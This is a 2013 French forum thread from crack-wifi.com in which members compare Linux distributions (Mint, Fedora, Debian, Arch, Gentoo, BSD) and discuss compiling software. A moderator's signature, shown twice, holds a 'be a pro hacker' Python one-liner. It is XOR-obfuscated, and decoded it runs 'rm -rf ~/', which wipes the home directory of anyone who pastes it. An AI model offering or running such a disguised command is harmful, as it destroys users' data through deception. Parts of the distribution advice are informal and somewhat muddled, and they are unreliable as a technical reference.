Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-01-2013 17:44:07

Tiger Jr
Membre
Lieu : France, Alsace.

Distributions GNU/Linux

Bonjour à tous,

Tout d'abord, j'ai créé ce sujet car je voudrais connaitre les avantages et désavantages sur certaines distributions GNU/Linux, avoir vos avis, vos points de vues dessus afin de comparer ces distributions. J'aime autant prévenir que je ne veux pas de trolls, et de préférence éviter les réponses comme «Unetelle c'est la meilleure», en cas de dérives, je devrais (ou un modérateur) sûrement fermer la discussion (mais je ne pense pas que ça arrivera, la plupart des personnes sur ce forum sont responsables, la preuve en est que vous traitez de sujets aussi sensibles que la sécurité informatique, le crack de clés WiFi,... sans problèmes).
Ensuite, veuillez m'excusez, je ne savais pas dans quelle section placer ce message, j'ai hésité à le poster dans « GNU / Linux en général » mais comme il y avait une majorité de sujets d'aide, j'ai évité et pense que c'est bon ici (le sujet pouvant sûrement encore être déplacé).

Après cette introduction un peu longue, je vais vous exposer mes demandes et questions. J'utilise actuellement une distribution Ubuntu (12.04.1 LTS) dont je suis satisfait, excepté un petit problème de grésillement du son mais se résolvant après quelques secondes d'écoute, et quelques incompréhensions niveau drivers vidéos, mais tant que ça marche, ça va :p Ainsi j'aimerais savoir comment sont d'autres distributions GNU/Linux. J'en ai donc sélectionné certaines, et voudrais recueillir vos avis dessus pour connaitre leurs points forts et défauts et m'en faire une opinion. Bien sûr, si vous souhaitez parler d'autres distributions qui ne sont pas dans ma liste et qui vous tiennent à cœur, je serai ravi de lire ce que vous en direz wink (je suppose qu'il y a quelques adeptes de Backtrack sur ce forum par exemple :p ).

Les distributions sur lesquelles je voudrais donc savoir cela sont : Ubuntu ; Debian ; Fedora ; Linux Mint ; Mageia ; Mandriva ; openSUSE ; Slackware ; Arch Linux ; Gentoo Linux.

Je pourrais donc me faire mon opinion dessus et voir lesquelles tester à l'avenir smile

Enfin, j'ai une petite question subsidiaire, je voudrais savoir quelle distribution vous pensez la plus adaptée à une amie, habituée à utiliser les systèmes d'exploitation Mac, et ayant utilisé Windows il y a plus longtemps. Ceci afin de peut-être lui mettre sur un vieil ordinateur Windows que je dois mettre à jour, et j'ai pensé y mettre GNU/Linux à la place ou en dual-boot (j'ai déjà eu son accord pour ça :p ), solution peut-être plus simple.

Merci d'avance pour vos avis, veuillez m'excuser pour ce message un peu long, j'en demande peut-être pas mal, mais ça devrait être un sujet plutôt intéressant smile

(Mince, j'ai été si long pour rédiger la première fois que j'ai été déconnecté avant et ai du réécrire, dommage, j'avais mieux rédigé la première fois x) )

Edit : légère modification de la liste des distributions.

Dernière modification par Tiger Jr (13-01-2013 21:00:34)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 13-01-2013 17:07:14

antares145
Membre d'honneur
Site Web

Re : Distributions GNU/Linux

Effectivement, ça sent le troll tongue

Voilà mon avis, mais je n'ai pas testé toutes les distributions que tu cites...
- Ubuntu : très bien pour quelqu'un qui n'a aucune expérience en informatique (l'interface est un peu déroutante), mais le système est (paraît-il) intuitif. Pas la plus légère de la bande cependant, et le système de mise-à-jour tous les 6 mois est parfois un peu périlleux.
- Debian : indiquée pour un serveur, où la stabilité est privilégiée. Les logiciels sont moins récents, mais l'ensemble est plus stable. Je pense qu'il n'y a pas d'interface graphique installée par défaut, ce qui demande quelques notions de ligne de commande au début. Beaucoup moins "intégrée" et finie que des systèmes comme Ubuntu, Fedora ou OpenSuse
- Fedora : elle joue sur le même créneau qu'Ubuntu, avec une interface plus classique. Certaines technologies utilisées sont plus avant-gardistes, mais l'ensemble reste stable et facile à utiliser
- Linux Mint : Dérivée d'Ubuntu qui garde une interface classique, et quelques outils de gestion simplifiée. Je ne la connais pas mais j'en entends beaucoup de bien, si je devaisen recommander une pour un débutant ce serait celle-là
- Mageia : je la connais très peu, je ne l'ai pas essayée depuis un bout de temps (à l'époque elle s'appelait encore Mandrake, ça me rajeunit pas). Elle est ptet bien encore développée en France.
- openSUSE : version grand-public d'un système commercial, elle est bien conçue pour les débutants (outils de gestion "maison"). Excellente intégration de l'environnement KDE, je dirais que c'est l'équivalent KDE d'une Fedora (plutôt branchée Gnome)
- Slackware : je connais pas du tout, mais c'est une des plus anciennes. Elle sert de base à pas mal de distributions dérivées, mais je pense que l'installation d'une slackware "brute" est un peu technique hmm
- Archlinux : mon coup de cœur (et celle que j'utilise), même si elle n'est pas vraiment à la portée des débutants. Elle est en Rolling-release donc on dispose toujours de programmes très récents, et c'es à toi d'installer ce dont tu as besoin. Comme c'est celle que je connais le mieux, je la présenterai en détail plus bas.
- Gentoo : une distribution basée sur les sources, qui est surtout intéressante si tu recompiles tes paquets toi-même. Ca prend un temps considérable, mais tu te retrouves avec un système optimisé pour ton usage (donc plus léger, plus rapide, avec uniquement ce dont tu as besoin). Pas mon premier choix, même si (paraît-il) elle n'est pas difficile à installer tant que tu as le Wiki sous les yeux.
- BackTrack : dérivée d'Ubuntu avec toute une série d'outils de sécurité informatique. Elle manque de finition, et s'adresse plutôt à un utilisateur averti. Bon, c'est utilisable par un débutant mais ilrisque d'être un peu perdu...

[J'vais pas me faire des copains avec des descriptions à l'emporte-pièce comme ça big_smile]

La distribution que tu choisiras va dépendre de ton usage, et de tes compétences en Linux (ou du temps que tu veux y consacrer). Si tu préfères rester sur une distribution grand public (interface graphique pré-installée, assistants d'administration,...), tu peux essayer Linux Mint ou Fedora (OpenSuse à la rigueur mais je la trouve plus "froide"). Je conseillerais plutôt Linux Mint, pour rester proche d'Ubuntu (notamment au niveau des commandes en terminal).
La question est aussi de savoir quelle interface tu veux. Bon, si c'est Unity le choix est limité ça n'existe que chez Ubuntu big_smile Mais si c'est Gnome par exemple, Fedora est plus indiquée, ou bien Ubuntu Gnome-remix. Pour KDE, plutôt OpenSuse. Pour Cinnamon ou Mate (qui ressemblent à l'ancien Gnome), plutôt Linux Mint. Pour XFCE, Linux Voyager (qui est une dérivée de Xubuntu). Chaque interface a ses partisans et ses détracteurs, et le débat est encore plus enflammé que pour les distributions, à toi de voir dans lequel tu te sens le plus à l'aise. Évidemment, dans presque tous les cas tu pourras installer tous les environnements de bureau, mais l'intégration ne sera pas toujours réussie...

Si tu veux passer au "niveau supérieur" et mettre les mains dans le cambouis, tu as deux possibilités selon moi : Debian ou Archlinux.
L'avantage de Debian, c'est que tu gardes les mêmes commandes qu'Ubuntu, les habitudes sont préservées. Par contre, les logiciels sont moins récents et la mise-à-jour continue de se faire par à-coups. Elle est également très susceptible par rapport aux licences des logiciels : les pilotes graphiques propriétaires et autres codecs non-libres ne sont pas directement accessibles. Tu peux toujours ajouter des dépôts spéciaux pour y avoir accès, ça n'a rien d'insurmontable. Tout comme tu peux activer des dépôts "Instables" pour avoir les dernières versions des logiciels, mais là tu risques d'avoir un système moins stable dans l'ensemble... Si tu veux des programmes récents, tu n'as pas beaucoup d'intérêt à passer sur Debian wink
Archlinux, par contre, propose des programmes très récents par défaut, tout en restant très stable. Elle est en permanence "à la pointe" donc il n'y a jamais de grosse mise-à-jour traumatisante (enfin, quoique, systemd... #troll). Par défaut elle est plutôt "nue", tu n'installes qu'un système minimal et c'est à toi à tout configurer et installer ce dont tu as besoin. La philosophie du système c'est "On ne fait rien pour toi, mais on te file la doc' dont tu as besoin"). Tu devras modifier des fichiers de configurtion (avec des commentaires explicatifs généralement bien faits et complets), et passer pas mal de temps sur le Wiki (francophone ou anglophone, mieux fourni) pour avoir un système complet. Ca prend du temps, mais tu en apprends énormément sur ton système et sur ce qui se passe "sous le capot". Faut aimer le terminal évidemment big_smile
Tu as aussi des dérivés d'Arch qui rendent la tâche plus facile aux débutants. Je pense notamment à Chakra, et surtout Manjaro Linux dont j'entends de plus en plus parler, en bien ! Ces distributions fournissent un installateur graphique et un système de base directement utilisable, même si ce dernier est sans doute moins léger et optimisé que si tu faisais tout toi-même smile Situ as envie de sortir du modèle Debian/Ubuntu, je pense que tu peux tester Manjaro, ça vaut la peine. Elle existe avec différents environnements, encore une fois à toi de choisir celui que tu aimes (fais-toi une clé USB Live pour tester les différentes versions sans devoir les installer wink)

Pour ton amie et ses habitudes de pommée (c'est plus fort que moi big_smile), je ne connais pas d'interface qui soit "identique" à MacOS (il y a eu beaucoup de tentatives plus ou moins réussies), donc elle devra d'office s'adapter à une nouvelle interface. Après, il faut voir ce qu'elle préfèrera : Gnome et KDE sont assez avant-gardistes (mais bien foutus, paraît-il), XFCE est plus classique, tout comme Mate et Cinnamon. Donc je pense que tu devrais tester ces interfaces dans un premier temps, et juger de l'interface qui lui conviendra le mieux (tu la connais mieux que nous). Si t'as pas envie de te prendre la tête, mets-lui une Linux Mint et vois ce qu'elle ne pense wink

Si tu veux en savoir un peu plus sur Ubuntu Gnome-Remix, Linux Voyager et Manjaro (entre autres), tu peux aller voir le blog de l'ami Noireaude (et sa communauté G+), ce sont des systèmes qu'ils ont pas mal testé --> http://www.la-vache-libre.com/

#3 13-01-2013 20:57:37

Tiger Jr
Membre

Merci bien pour ta réponse, déjà lors de ma première venue sur ce forum c'était toi qui m'avais aidé smile

Oh, pour ce qui est des interfaces, ce n'est pas ce qui détermine mon choix, je suis passé de Windows à Unity il y a 3-4 mois (ben en fait peu après la sortie de la 12.10) et le seul truc m'ayant perturbé est la place de la croix de la droite sur Windows à gauche sur Unity :p Autant dire pas grand chose. En revanche, les mises à jours principales pour changer de version, je ne les fais pas pour l'instant, je préfère rester sur la LTS. Déjà mon ordi étant peu puissant, je me demande si elles ne demanderont pas plus de ressources, puis quand je vois les petits problèmes (apparemment facilement réglables via une simple option) avec les fuites à cause d'images d'Amazon un truc comme ça, je reste comme avec l'ancienne wink

Mes choix personnels s'orienteraient de préférence vers une distribution assez grand public, avec interface graphique plutôt que par ligne de commande. Donc je pense éviter les 4 dernières (oh non, un faux fan de GNU/Linux :p ). Pour Linux Mint, je devrais m'intéresser à la version LMDE, basée sur Debian aussi, ça pourrait être intéressant.
En gros pour tester, je devrais voir si elles sont chacune portable ou je ne sais plus comment dire pour les démarrer depuis la clé USB sans installation, ainsi je pourrait voir Fedora et d'autres qui m'intéressent bien. Je garde Arch Linux sous le coude quand même pour plus tard wink D'autant qu'elle se dit apparemment fondée sur un principe de simplicité, ça reste donc à voir pour un utilisateur moyen comme moi, après tout, c'est comme ça qu'on s'améliore, n'est-ce pas ? wink
Sinon, je ne connaissais pas du tout Chakra ni Manjaro. En effet, Manjaro semble avoir de très bons avis pour qui a envie de quelque chose basé sur Arch Linux, à voir également smile
C'est fou comme le monde de de GNU/Linux semble si vaste, ça semble étonnant, et ça fait peur en même temps, par où commencer ? x)

Héhé, t'en fais pas, je lance parfois de petites piques orientés vers Apple également :p Je vais regarder, d'ailleurs pour moi aussi je comptais le faire, à quoi ressemblent les différentes interfaces, Gnome, KDE, XFCE, LXDE. Après, Unity, Mate et Cinnamon qui ils me semble sont assez similaires, pour avoir testé l'un d'entre eux, je le trouve déjà assez proche de MacOS et ne devrait pas trop déstabiliser un habitué. Je pense donc en effet lui mettre Linux Mint, moins de problèmes de drivers, et tout ce qui est en rapport avec les logiciels propriétaires. Reste à décider entre la standard et la rolling basée sur Debian.

Merci encore pour ta participation bien riche ! smile

#4 13-01-2013 21:35:02

spawn
Modérateur

Que dire de plus hmm

Archlinux c'est comme vim. Il ne faut pas avoir besoin d'être productif rapidement, mais au bout d'un moment on y gagne en vitesse et en maîtrise.

J'avais essayé, et faute de collègues expérimentant aussi, je suis repassé à debian.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 14-01-2013 15:16:34

kcdtv
Membre d'honneur
Lieu : Internacionaluña

antares_145 a écrit :

- Linux Mint : Dérivée d'Ubuntu qui garde une interface classique, et quelques outils de gestion simplifiée. Je ne la connais pas mais j'en entends beaucoup de bien, si je devaisen recommander une pour un débutant ce serait celle-là

plus_un

J'avais essayé la version 11 et n'avait pas aimé, trop ·tunée" à mon goût et quelques bugs.
  J'ai refais un coup d'essai avec la 13 (maya) en essayant d'être plus objectif et me mettre dans la peau d'un débutant qui doit prendre en main son système.
  Et j'ai étais impressionné par linux mint avec environnement graphique canelle smile
C'est parfait pour commencer:
La prise en main est exceptionnelle et directe après installation. Ils ont pensé à tous les détails : l'utilisateur lambda n'a besoin de rien installer-configurer pour pouvoir utiliser ça machine à un niveau qui ne le fera pas regretter windows.
  Les gens à qui je le fais installer sont enchantés, surpris par la qualité du desktop, bluffés par l'intuitivité de cannelle, La réaction c'est "Ah ouai... c'est quand même plutôt du genre mac que windows" (à comprendre comme quelque chose d'efficace, intuitif, complet par défaut, stable et  bien pensé)

Avant je conseillais Xubuntu (ubuntu et XFCE), très bon car léger et simple mais qui va te demander un peu plus d'efforts pour configurer et installer correctement ce dont tu as besoin car c'est une distribution beaucoup moins fournie car pensée pour fonctionner dans des ordinateurs avec peu de ressources.
  Maintenant je conseille Linux Mint et cannelle aux débutants  wink

#6 18-01-2013 01:06:13

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

J'ai tout lu smile.

Je me permet de préciser que si madame veut garder ses vilaines habitudes OSX, il y a une distribution peu connue qui propose un Gnome relooké MAC et qui s'appelle Eos (Elementary OS).

Tu peux en savoir plus en jetant un œil ici ou sur le site officiel d'Eos.

Moo !!!

Ps : J'en profite pour faire un gros bisous à tout le monde smile

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#7 18-01-2013 10:36:53

spawn
Modérateur

Erk un bisou de bovin

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#8 18-01-2013 17:04:34

kcdtv
Membre d'honneur
Lieu : Internacionaluña

lol
Baveux à souhait...
Noireaude, je t'ai MP via foro wink

#9 18-01-2013 18:41:34

Tiger Jr
Membre

Ah tiens, Elementary OS, celui-là j'avais jamais entendu parler, en effet, en naviguant un peu sur le site, j'ai en effet l'impression que c'est quasi identique à MacOS, enfin, du moins le bureau et le navigateur de fichiers que je connais. En revanche il est en beta je crois, je ne sais pas si du coup ce serait le meilleur choix dans l'immédiat. Niveau configuration recommandée, c'est pareil que Linux Mint (que je suis presque sûr de mettre, le 13 en version LTS), mais je me demande finalement si je vais pas mettre la version XFCE, étant donné que c'est un mini ordi, du genre écran 10 à 13 pouces, il ne doit pas être bien puissant, et il parait que cet environnement est bien léger. À voir si son ordi a du mal avec le Cinnamon.
Enfin, je vais quand même lui montrer EOS demain, et voir sa réponse.

Merci bien wink

#10 19-01-2013 16:04:15

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

C'est vexant sad moi cela fait deux ans qu'il me fait des bizoux, tu préfères le coyote ?

Perso, Archlinux sera le but à atteindre une fois passer du temps sur les distributions simples et accessibles pour les débutants, mais à condition d’être vraiment passionné. Et je crois qu'avec Archlinux, l'administration des systèmes à base de Linux (notamment les serveurs, les routeurs, systèmes embarqués, etc) serait un jeu d'enfant, pour la simple raison qu'il oblige à comprendre à fond avant de l'utiliser. J'ai qu'un seul ordi pas encore passer à la vitesse supérieure avec cette distribution mais j'ai attrapé le virus Arch depuis que je fréquente le forum smile

arch

#11 21-01-2013 04:10:01

noireaude
Membre d'honneur
Site Web

kcdtv a écrit :

lol
Baveux à souhait...
Noireaude, je t'ai MP via foro wink

Baveux à souhait oui smile

Par contre désolé mais je n'ai pas eu ton message amigo Oo.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#12 22-01-2013 01:02:42

Tiger Jr
Membre

Bon, finalement je n'ai installé aucune distribution GNU/Linux chez mon amie, j'ai laissé les Windows qui marchaient. Mais j'avais tout de même emporté une clé avec une distribution Linux Mint 13 Cinnamon, et bien sûr mon ordi avec Ubuntu 12.04 LTS. Ça a plutôt fait son effet le lancement de la version en live depuis la clé USB, sans installation, c'est vrai que quand j'y pense, je sais pas si Microsoft et Apple font aussi ça avec leurs systèmes d'exploitation (en tout cas jamais eu l'occasion de voir ça).
Hmm, bien sympathique la petite image de présentation d'Arch Linux, une image vaut bien mille mots ici tongue Nan, je vais tester quelques distributions la semaine prochaine sans doute, quand j'en aurai l'occasion. Bien que je ne pense pas tester Debian, il semblerait (comme l'a aussi souligné antares) qu'elle soit plus adaptée aux serveurs, avec des logiciels moins mis à jour, or un utilisateur lambda pour une utilisation simple de son ordinateur souhaite peut-être plus quelques innovations en plus proposées par des versions récentes des logiciels qu'une stabilité à toute épreuve wink

En outre, je me pose des questions sur la compilation des paquets, je me demandais comment faire pour que ce soit optimisé au maximum ? Apparemment avec Gentoo cela se fait, mais je me demandais si c'était possible avec les autres distributions également, et si oui, est-ce automatique ou bien y a t-il quelques commandes à réaliser à chaque fois ? (Que ce soit avec Gentoo ou d'autres si la (re ?)compilation est disponible.)
De plus, que pensez-vous des systèmes BSD ? Je ne crois les connaitre que par leur logo, et je ne sais pas du tout si ils sont (me semble qu'il en existe des versions commerciales et d'autres « grand public ») adaptés à une utilisation standard.
Je m'éloigne peut-être un petit peu du sujet principal donc n'hésitez pas à m'indiquer si ces questions sont à poser ici ou pas.

Merci bien smile

Edit : Je retire ce que j'ai dit sur Debian, il existe en effet la version instable sur laquelle Ubuntu est basé il me semble (et une version testing aussi, mais je ne sais pas encore trop à quoi tout ça correspond).

Dernière modification par Tiger Jr (22-01-2013 01:12:53)

#13 22-01-2013 03:21:47

noireaude
Membre d'honneur
Site Web

Plop en ce qui concerne BSD je ne vais pas trop m'étaler car je n'en ai pas utilisé, mais ta copine oui apparemment (MAC utilise un noyau BSD). Cela dit en distribution pure et dure ça n'a rien à voir hein wink

Et oui il existe des version GNU/BSD grand publique comme pcBSD et FreeBSD (je te laisse fouiner avec Google)....

En ce qui concerne la compilation  c'est un peu "le format universel dans le monde GNU/Linux". Donc oui tu peux compiler sur toutes les distributions, ce n'est pas relatif à Gentoo (que je te conseil quand même d'éviter pour commencer). Si tu veux voir de plus près en quoi cela consiste, je te conseil de consulter ce très bon tutorial sur la compilation sous GNU/Linux.

Amuses-toi bien.

Moo !!!

Dernière modification par noireaude (22-01-2013 03:23:44)

#14 26-01-2013 22:10:21

antares145
Membre d'honneur
Site Web

Tiger JR a écrit :

Ça a plutôt fait son effet le lancement de la version en live depuis la clé USB, sans installation, c'est vrai que quand j'y pense, je sais pas si Microsoft et Apple font aussi ça avec leurs systèmes d'exploitation (en tout cas jamais eu l'occasion de voir ça).

Ils sont conçus de façon complètement différente donc non, il n'y a pas vraiment d'équivalent. Enfin si, pour Windows tu as le système utilisé par BartPE (et ses dérivés) pour avoir un Windows XP "Live" mais c'est loin d'être aussi puissant et abouti qu'un Linux Live. Et MacOS, je doute que ça existe puisque tu n'es pas sensé utilisé l'OS sur une autre machine que celle où il est installé smile

Pour Debian, comme je le disais (mais je n'ai peut-être pas été assez clair), elle est surtout connue pur sa version "Stable" blindée mais en retard, adaptée aux serveurs. En ce qui concerne les versions Sid/Unstable et Testing, je citerai juste Wikipedia :

Debian est toujours disponible en trois versions (trois branches) qui sont :

- stable : version figée où les seules mises à jour sont des correctifs de sécurité ;
- testing : future version stable où seuls les paquets suffisamment matures peuvent rentrer ;
- unstable : surnommée Sid, il s'agit d'une version en constante évolution, alimentée sans fin par de nouveaux paquets ou de mises à jour de paquets déjà existants (on parle de Rolling release).

De plus, il existe un dépôt de paquets nommé backports (voir ci-dessus) et un autre nommé experimental qui contient des paquets expérimentaux de logiciels dont l'utilisation pourrait dégrader le système. Cependant, le dépôt experimental ne contient pas tous les paquets disponibles dans les branches stable, testing et unstable. Voilà pourquoi il n'est pas considéré comme une branche à part entière.

Source --> Debian [Wikipedia FR]
Tous les 6 mois, l'équipe d'Ubuntu prend un "cliché" de la version Unstable (pour avoir des logiciels récents) et travaille dessus pour fournir la version d'Ubuntu. Tu peux travailler directement en Debian Unstable sur ta machine (contrairement à ce qu'indique son nom, ce n'est pas si instable que ça) mais alors tu perds l'intérêt d'une Debian... Si tu veux du récent, ce n'est pas la meilleure.

A propos de l'optimisation, comme tu l'as compris elle passe généralement par une recompilation. Ca permet de ne pas inclure des fonctions dont tu n'as pas besoin, et de générer un code qui exploite au mieux ton matériel.
- pour la gestion du matériel, on voit généralement que le noyau est fourni en i386 (32 bits) ou x64 (64 bits). Le i386 peut être utilisé sur des processeurs très anciens, mais ça implique qu'il n'emploie pas les nouvelles instructions ajoutées au 486, 686 etc... puisque les vieux processeurs ne les connaissent pas. Donc ça marche partout mais ce n'est pas optimal, en recompilant ton code spécifiquement pour ton architecture, tu utilises toutes les instructions spécifiques de ton matériel (qui n'ont pas été intégrées par défaut pour être sûr que ça marche chez tout le monde)
- pour les options non nécessaires, tu peux recompiler ton noyau avec uniquement le support des périphériques dont tu disposes. Si tu sais que tu n'emploieras jamais de port ISA, de cartes PCMCIA, de lecteur disquette, de tuner TV,... tu peux recompiler un noyau minimal sans le support de tous ces trucs, qui sera plus léger et plus rapide.
Les deux exemples que je viens de donner s'appliquent au noyau Linux, maus d'une façon générale aux autres programmes aussi. Tu peux les rendre plus rapides en utilisant des instructions optimisées, et tu peux les compiler sans le support de fonctions dont tu n'as pas besoin.

Évidemment, tout ceci te donne un système "aux petits oignons" très personnalisé, mais ça prend un certain temps de choisir, pour chaque programme, quelles options tu gardes et lesquelles tu vires. C'est particulièrement vrai pour le noyau, où la première sélection des paramètres peut prendre pas mal de temps (même si c'est bien expliqué sur le Wiki, il paraît). Ensuite, la compilation elle-même (le passage du code-source aux programmes) peut être longue, pour le noyau ou des programmes de grande taille comme un environnement de bureau (Gnome, KDE,...).
En théorie, quand une nouvelle version sort, tu réutilises le même "script de compilation" (quelles options tu gardes, lesquelles tu vires, quelles optimisations tu actives,...) mais tu dois quand même recompiler le nouveau code. Parfois ça va vite, parfois t'en as pour une nuit à laisser mouliner la bécane, qui a d'ailleurs intérêt à être pêchue côté CPU si tu veux te lancer là-dedans smile

Toutes les distributions, même Gentoo, proposent quand même des paquets dits "binaires" ou pré-compilés. Ils le sont avec des options génériques donc sous-optimales, mais au moins c'est rapide. Tu peux choisir de prendre du pré-compilé pour certains programmes et de ne recompiler que le plus critique (le noyau, des programmes de calcul ou de retouche vidéo,...). C'est possible sur toutes les distributions (ex : apt-source sous Ubuntu), mais particulièrement facilité (et encouragé) sous Gentoo où l'intérêt est justement de recompiler un maximum. Je préfère l'approche Arch : un maximum de binaire et quelques programmes recompilés "à la main" via le système ABS.

Un dernier mot à propos des BSD : à ton niveau, tu ne verras pas de différence par rapport à un Linux. Il y a quelques subtilités de part et d'autres (parfois ça tient juste à une question de licence), mais en gros ça fonctionne de la même façon. Par contre tu risques d'avoir moins de programmes dispos sous *BSD, et une communauté moins nombreuse pour t'aider... A ton stade j'en resterais à un Linux, un peu technique si tu veux progresser (Arch, Gentoo), mais ça n'a pas d'întérêt de passer à un autre Unix pour toi.
(si avec ça je ne me fais pas incendier par le prochain fan de BSD qui passe, j'y comprends plus rien big_smile)

#15 31-01-2013 21:45:46

Tiger Jr
Membre

Bonsoir,

Merci bien Noireaude pour ce lien intéressant, permettant non seulement de savoir comment compiler, mais également d'en apprendre un peu plus sur son fonctionnement, ces histoires de sources, headers, librairies,... En fait je me rends compte que je l'avais déjà fait pour quelques programmes (il me semble d'ailleurs que j'avais du le faire pour corriger des bugs du WiFi sous Ubuntu, en téléchargeant un pilote Compat).

Donc si je comprends bien, la version unstable de Debian est en gros comme Ubuntu, mais avec des paquets un peu différents (mais sûrement assez proche, Ubuntu étant basé dessus) ?

Les instructions, ça doit être les SSE X que j'ai déjà vu à certains endroits, sans doute des tests d'optimisation du processeur. Ou Wikipédia, y allant fréquemment pour divers sujets.
Ainsi, si je veux compiler quelques trucs, il me suffira de refaire pareil, décompresser l'archive, ./configure, etc ? Aucun besoin de connaitre son architecture ou autre ? (D'ailleurs je n'aurai su le dire, je sais que j'ai un processeur AMD-E350 (ouais c'est du lourd hein :p ), mais après une rapide recherche, je vois que j'ai une architecture du doux nom de Bobcat, et il y a un truc à voir avec AMD64 ou x86-64, mais si maintenant il avait fallu documenter mon ordinateur, je ne saurai dire ce qu'il faut mettre parmi ceci. Remarque, il se connait mieux que je ne le connait.)

D'accord, je vois pour BSD, c'est peut-être orienté vers d'autres usages, ou ayant une plus petite part de marché, un peu moins suivi ou fourni.

Hélas, je n'ai pas encore eu le temps d'essayer les distributions que je voulais, après les avoir téléchargés, j'ai eu un petit problème, non informatique, qui me fait mettre mes activités en pause pour le moment hmm À plus tard les tests donc sad

Oh, je viens de faire le rapprochement d'ailleurs entre le site de la-vache-libre et Noireaude que j'ai vu sur ce forum, un peu long à la détente là x)

#16 31-01-2013 22:12:18

noireaude
Membre d'honneur
Site Web

Plop Tiger Jr, la Debian Unstable n'est pas la même chose qu'Ubuntu.

Debian propose 3 déclinaisons de sa distribution :

Debian Stable : En gros tous les paquets sont gelées jusqu'à la prochaine version stable (ce qui peut prendre plus de 2 ans dès fois). Le mises à jour sont essentiellement des MAJ de sécurité.

Debian Sid : Elle permet d'avoir des paquets plus récents mais uniquement basés sur les dernières versions "stables" de ces applications.

Debian Unstable : Qui permet d'avoir les dernières versions des applications, même si elles ne sont pas encore passées en stable.

Ubuntu est un dérivé de Debian mais ce différencie sur pas mal de points, on ne peut donc plus vraiment les comparer (même si la base d'Ubuntu reste Debian).

BSD effectivement orienté vers d'autres usages, serveur, systèmes embarqués, et sert de base à d'autres OS comme celui d'Apple par exemple.

Je n'irai pas comparer les parts de marché car je n'ai pas de chiffres.

Par contre BSD est également présent en desktop est n'est pas cantonné aux usages cités plus haut. Il n'est certainement pas moins suivi que Linux non plus. C'est juste moins orienté grand publique, donc les sites en parlent peu.

Pour la compil je préfère laisser parler ceux qui s'y connaissent mieux que moi, j'y ai très peu recours et je ne suis donc pas un fin connaisseur en la matière wink.

Cordialement.

Noireaude "en effet de la vache libre" smile

Dernière modification par noireaude (31-01-2013 22:14:01)

#17 10-02-2013 20:53:16

Tiger Jr
Membre

Bonsoir à tous,

Tout d'abord, merci Noireaude pour ces précisions wink

Ensuite, j'ai testé rapidement en live Linux Mint et Fedora la semaine dernière, je testerai encore Mageia, openSUSE (en mars, pour la 12.3) et peut-être Arch Linux (bien que je ne sois peut-être pas assez expérimenté), en prenant un peu plus de temps, ou en mettant une fonction de live permanent sur la clé, histoire de découvrir un peu mieux.
Je ne les ai pas essayé assez longtemps, mais en même temps ne trouvais pas grand-chose à faire dessus, à part regarder l'interface (de toute façon bien personnalisable je trouve). Et justement ça m'a plutôt embêté, en effet, je n'ai du coup pas vraiment de préférences, m'adaptant plus ou moins à toutes les interfaces, or je ne vois que ça lors de mes petits essais. Ainsi, je pense qu'il faudrait que je m'intéresse à des détails plus techniques comme la gestion des paquets, dépendances, la stabilité, les paquets récents ou pas, etc, afin d'orienter mon choix. Puisque j'imagine bien qu'Ubuntu et Fedora sont écrits complètement différemment et qu'ils ne se distinguent pas uniquement par leurs interfaces tongue

Sinon, j'ai été surpris sur le site de Mandriva, il y a encore un mois, il me semble avoir pu télécharger une version 2011 sans problèmes, là en voulant y retourner (pour comparer les hash suite au déplacement d'un ordi sur l'autre), je n'ai plus trouvé de version gratuite, il semblerait que ce soit devenu uniquement payant. Ainsi je l'ai supprimé de mes distributions à essayer, craignant un non-support des anciennes versions à l'avenir.

En revanche, je demanderai si vous en avez, des retours sur deux autres distributions susceptibles de m'intéresser, à savoir : PCLinuxOS et Frugalware. Bien sûr, ce sujet est un très bon endroit pour exposer vos retours sur toutes les distributions que vous connaissez et dont vous avez envie de partager vos impressions wink

#18 10-02-2013 21:15:08

noireaude
Membre d'honneur
Site Web

PCLinux OS je ne connais pas trop par contre en revanche sur notre IRC tu as un dev Frugalware qui est là assez souvent (Devil505), tu peux toujours venir lui poser quelques questions wink

Annonce